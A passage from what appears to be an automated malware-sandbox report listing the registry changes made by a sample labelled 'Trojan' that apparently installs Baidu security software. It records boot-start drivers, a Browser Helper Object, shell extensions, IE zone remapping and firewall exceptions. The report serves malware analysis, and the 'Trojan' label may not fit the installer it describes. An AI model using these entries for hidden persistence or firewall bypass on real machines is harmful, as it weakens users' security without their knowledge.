"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\GetSupplyId.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\KVInstallHelper.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667.bak\bd0001.dll.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch.bak,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
"Description" = "bd0001"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

The process BaiduHips.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
"Group" = "bddriver"
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 7D C4 47 59 87 2A C6 05 E4 0D B5 7F 25 59 F1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
"DisplayName" = "bd0001"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch.bak,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
"Description" = "bd0001"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

The process netsh.exe:2640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 72 13 D7 06 EE E8 C2 D0 2D B5 67 8E 4D 1F 9F"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process BDKVWsc.exe:2568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 37 9A 77 FC C6 44 F3 68 DC 3E 1B 06 35 45 E9"

The process BDKVWsc.exe:2668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 AE 50 42 A3 70 E8 26 C1 C6 48 F7 FF EB 58 B6"

The process RegSvr32.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\BDSWShellExt.BDSWShellExtMenu]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]
"(Default)" = "{70891BDB-3BE3-45A9-96B6-184ABA962091}"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "PSFactoryBuffer"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\NumMethods]
"(Default)" = "3"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
"ThreadingModel" = "Both"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "IBDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\ProxyStubClsid32]
"(Default)" = "{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\AppID\{A8B81847-1462-4756-9D4A-F506BC5361CD}]
"(Default)" = "BDSWShellExt"

[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\AppID\BDSWShellExt.DLL]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{11292110-6F8D-4D56-863C-44902A1E7880}" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CurVer]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 23 D2 B7 0B A2 95 DF D8 A6 EC 31 04 76 F7 CC"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1]
"(Default)" = "BDSWShellExtMenu Class"

The Trojan deletes the following registry key(s):

[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]

The process RegSvr32.exe:2256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 89 F1 0E 50 4A 3B 2A D0 B2 79 71 13 07 B0 D3"

[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"

[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"

The Trojan deletes the following registry key(s):

[HKCR\BDShellExt.BDShellExtMenu\CurVer]
[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
[HKCR\BDShellExt.BDShellExtMenu\CLSID]
[HKCR\BDShellExt.BDShellExtMenu.1]
[HKCR\BDShellExt.BDShellExtMenu]

The process RegSvr32.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B A1 F1 EA EE 82 77 1D 8D B5 4E 15 5A 33 DE 86"

The process RegSvr32.exe:1232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 12 A1 17 A9 F2 C4 64 BE E6 3E 7E D4 BE 4E 12"

[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll"

[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "WebMonBHO"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "BDHOOK"

"NoExplorer" = "1"

The process RegSvr32.exe:2360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 B8 20 6B DD 9F A6 F1 02 82 5F A1 FE 62 CB 74"

The process bddownloader.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"

[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"

[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 C1 3B D2 F1 8A 62 48 76 B9 52 FC 65 A4 46 F0"

[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process bddownloader.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 C2 BA 26 D0 8C B5 7E E3 0E 4A 70 10 7C C3 3B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\metnsd\clsid]
"SequenceID" = "59 02 BF 88 AE 5C DF 4E 8B F2 61 7C 4A 3A BB 8F"

The process bddownloader.exe:3792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 0F A4 74 3D 75 74 94 70 CF 34 78 ED 14 97 FE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process G1023_s_70904.exe:3576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度卫士]
"Publisher" = "百度在线网络技术(北京)有限公司"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度卫士]
"DisplayVersion" = "3.0.0.3971"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "百度杀毒功能组件"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度卫士]
"DisplayIcon" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\app.ico"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"InstallDate" = "2014-11-6"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\GetSupplyId.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\KVInstallHelper.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll.bak,"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733"

[HKCR\Unknown\shell\openas\command]
"DelegateExecute" = ""

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts]
"Baiduan Number(TrueType)" = "baiduan_number_new.ttf"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"VirusTime" = "2013.04.05 1216"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"Version" = "1.1.0.733"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"

[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDAFileHelper.exe -file=%1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "3.0.0.3971"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 9D AC BF FD 8A 85 33 78 FA 65 C6 21 1A 46 70"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"

[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Group" = "bdsvcorder"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Tag" = "1"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallPath" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度卫士]
"UninstallString" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\uninst.exe"

[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Group" = "bdsvcorder"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bdsvcorder" = "04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag" = "273"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"

[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Tag" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallDir" = "%Program Files%\Common Files\Baidu\BaiduHips"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"SupplyID" = "70904"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"

[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度卫士]
"DisplayName" = "百度卫士3.0"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"

"Description" = "bd0001"

[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnBugRpt.exe:*:Enabled:百度卫士BUG上报程序"

"BaiduAnTray.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe:*:Enabled:百度卫士托盘程序"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAn.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAn.exe:*:Enabled:百度卫士主程序"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnUpdate.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnUpdate.exe:*:Enabled:百度卫士更新程序"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
